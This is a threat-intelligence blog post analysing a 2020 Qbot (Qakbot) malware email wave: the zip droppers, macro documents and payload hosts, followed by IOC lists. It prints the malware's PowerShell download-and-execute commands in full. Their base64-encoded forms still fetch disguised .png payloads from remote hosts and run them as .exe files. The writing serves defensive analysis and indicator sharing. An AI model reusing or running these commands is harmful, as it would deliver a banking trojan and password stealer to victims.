Since last month there have been significant resurgence in Qbot. Different Qbot waves were reported like “feature“, “extend“, “string” and “one-drive” wave. Several bot_groups spx85 to spx103 were found active for this Qakbot resurgence. In this post we will be going though detailed analysis of the Qbot wave -“feature wave” from bot_group spx98.
What is Qbot?
Qbot is Malwarebytes’ detection name for a large family of backdoor trojans that has been around in one form or another since 2009. Qbot is mainly a banking Trojan and password stealer. It is worth noting that most variants are sandbox/VM aware and some have polymorphic abilities too. Qbot main source were exploit kits but now they have started using email links and attachments on a large scale.
Analysis of this new wave – chain of events
1. Delivery Method – Email attachment / Link
2. Dropping Initial payload – zip file
When user click on the link “ATTACHMENT_DOWNLOAD”, it drops the zip file from the link embedded in above emails. Some of the initial zip file payload dropping links observed in emails were:
- hxxp://braincricket[.]com/feature/10510/10510.zip – VT Analysis
- hxxp://bouyonclip[.]com/feature/66981937/66981937.zip – VT analysis
- hxxp://bread[.]karenkee[.]com/feature/9494249/9494249.zip – VT analysis
- hxxp://careon[.]io/feature/553382.zip – VT analysis
- hxxp://cloudtunez[.]com/feature/0160397.zip – VT analysis
3. Extracting Mal Doc and Enabled Macros
Upon opening the word doc, when enable editing is clicked. It enables macros leading to silent powershell code execution, which tries to establish link with 6 URLs to further drop the Qbot payload (PE) name as .png files.
4. PowerShell code and commands found embedded in the Maldoc
Encoded and Decoded Codes 1:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://automatischer-staubsauger[.]com/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
Encoded Code 2:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2RlbW8uY2FnbGlmaWNpb2NsZXJpY2kuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://demo.caglificioclerici[.]com/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '2' + '.e' + 'x' + 'e')
Encoded Code 3:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2FuYW1pa2FpbmRhbmVnYXMuaW4vZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '3' + '.e' + 'x' + 'e')
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://anamikaindanegas[.]in/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '3' + '.e' + 'x' + 'e')
Encoded Code 4:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2RhaW9ocy5jb20udHcvZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '4' + '.e' + 'x' + 'e')
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://daiohs.com[.]tw/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '4' + '.e' + 'x' + 'e')
Encoded Code 5:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzM2MGRpZ2l0YWxjbGljay5jb20vZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '5' + '.e' + 'x' + 'e')
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('hxxp://360digitalclick[.]com/feature/777777[.]png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '5' + '.e' + 'x' + 'e')
5. Qbot Payload
All Qbot payload link observed in PowerShell command were serving different files with same name- 777777.png (PE file disguised as an Image file). PE File downloaded from the below mentioned links, rewrites itself to following path: c:\users\public\tmpdir\X.exe [Where X can be any integer]and is executed.
- hxxp://demo.caglificioclerici[.]com/feature/777777[.]png
- hxxp://daiohs.com[.]tw/feature/777777[.]png
- hxxp://anamikaindanegas[.]in/feature/777777[.]png
- hxxp://demo.caglificioclerici[.]com/feature/777777[.]png
- hxxp://automatischer-staubsauger[.]com/feature/777777[.]png


Brief Qbot PE analysis summary can be seen in below snapshot with process tree and associated shell commands observed during its analysis.

For complete detailed analysis of the Qbot PE sample please visit the following links:
- VenusEYE Sandbox report
- Cuckoo Sandbox report
- OSINT of this sample – VT analysis
Threat Intel – IOCs
Common pattern and behavior among all waves detected in April 2020
- Email with Attachment or link.
- Link drops the randomly figured 4-9 digits .zip file. For example: 10510.zip, 82386.zip and etc.
- Most of the Zip file have a doc file named in several formats:
- Format one: Judgment_X.doc
- Format two: Judgment_X_X.doc
- Format two: NUM_X.vbs
- All the Qbot payload observed were disguised in Image file format -.png. For example: 4444.png, 777777.png, 999999.png and etc.
There are tons of IOCs observed across this month, I have tried compiling them from different sources into one place for you all. These IOCs include zip files, URLs, hashes and Qbot PE(png files).
- One- drive wave IOCs – 8th April 2020 – https://pastebin.com/raw/SiR5HVTD
- “extend” wave IOCs – 9th April 2020 – https://pastebin.com/raw/MejFGSW6
- Mal Docs and Qbot PE sample hashes – 15th April 2020 – https://pastebin.com/raw/319K9r7t
- “string” wave IOCs – 14th April 2020 – https://pastebin.com/raw/W671SZYc
- “feature” wave from spx_98 IOCs – 16th April 2020 – https://pastebin.com/raw/q2UFXUi3
- Qbot IPs – 16th April 2020 – https://pastebin.com/raw/QhADdVnZ
- “diiffer” wave from bot_group spx_99 IOCs – 17th April 2020 – https://pastebin.com/raw/ji1NBpFz
- Qbot IPs – 17th April 2020 – https://pastebin.com/raw/NueGcP8G
- “vary” wave from bot_group spx_100 IOCs – 20th April 2020 – https://pastebin.com/raw/qSYjLhPq
- “evolving” wave from spx_101 IOCs -21st April 2020 – https://pastebin.com/raw/3CnJw1Ui
- spx_101 IP IOCs 21st April 2020 – https://pastebin.com/raw/LnrpaeCZ
- “mapro/pump” wave from spx_102 IOCs 22nd April 2020 – https://pastebin.com/raw/sRfDp5m2
- spx_102 IP IOCs 22nd April 2020 – https://pastebin.com/L0g5fRgv
- “docs_3 character” wave from spx_103 -m23rd April 2020 – https://pastebin.com/raw/bWU9PTbv
- spx_103 bot group IP IOCs- 23rd April 2020 – https://pastebin.com/raw/7bYzetJF
- “doc_3characters” characters belonging to [a-zA-Z0-9] from spx_104 – 24th April 2020 – https://urlhaus.abuse.ch/browse/tag/spx104
- spx_105 similar to spx_104 wave pattern – https://urlhaus.abuse.ch/browse/tag/spx105
- URLhaus repository: https://urlhaus.abuse.ch/browse/tag/qbot/
“Evolving Wave” is the most latest one, targeting individuals and corporate. Stay tuned for more upcoming IOCs.
#Qbot #malware #april #spx_bot #waves #extend_wave #string_wave #feature_wave #differ_wave #vary_wave #evolving_wave
Stay tuned for more Cyber stuff !!
Pingback: Multiple Qakbot (Qbot) waves detected in April 2020